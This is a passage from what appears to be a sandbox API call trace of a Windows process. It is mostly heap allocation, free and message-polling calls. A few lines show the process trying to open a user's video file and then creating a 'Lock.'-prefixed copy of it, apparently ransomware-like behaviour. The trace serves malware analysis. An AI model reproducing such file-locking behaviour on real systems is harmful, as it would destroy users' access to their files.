(HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0258.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0258.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0258.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0258.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0258.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0258.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0258.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0258.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0258.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0258.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0258.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0258.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0258.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0258.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0258.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0258.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0258.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0258.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0258.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0258.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0258.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0258.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0258.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0258.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0258.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0258.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0258.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0258.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0258.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0258.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0258.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0258.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0258.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0258.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0258.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0258.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0258.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0258.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0258.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0258.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0258.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0258.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.737] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0258.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0258.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0258.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0258.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0258.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0258.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0258.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0258.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0258.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0258.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0258.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0258.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0258.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0258.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0258.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0258.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0258.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0258.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0258.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0258.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0258.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0258.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0258.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0258.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0258.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0258.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0258.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0258.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0258.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0258.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0258.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0258.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0258.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0258.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0258.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0258.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0258.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0258.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0258.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0258.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0258.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0258.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0258.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0258.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0258.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0258.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0258.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0258.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0258.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0258.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0258.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0258.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0258.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0258.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0258.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0258.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0258.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0258.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0258.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0258.742] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.742] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.742] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.742] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0258.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0258.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0258.742] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/o7xXPd8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\o7xxpd8"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0258.742] GetLastError () returned 0x5 [0258.742] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0258.743] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.743] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0258.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0258.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0258.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0258.743] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/Lock.o7xXPd8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\lock.o7xxpd8"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0258.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0258.744] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0258.744] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.744] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0258.744] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0258.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0258.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0258.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0258.744] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0258.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0258.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0258.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0258.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0258.745] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0258.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0258.745] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0258.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0258.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0258.745] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0258.745] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0258.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0258.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0258.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0258.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0258.746] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0258.746] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.746] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0258.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0258.746] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0258.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0258.746] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0258.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0258.746] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0258.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0258.746] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0258.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0258.746] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0258.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0258.747] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0258.747] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0258.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0258.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0258.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0258.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0258.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0258.747] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0258.747] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, 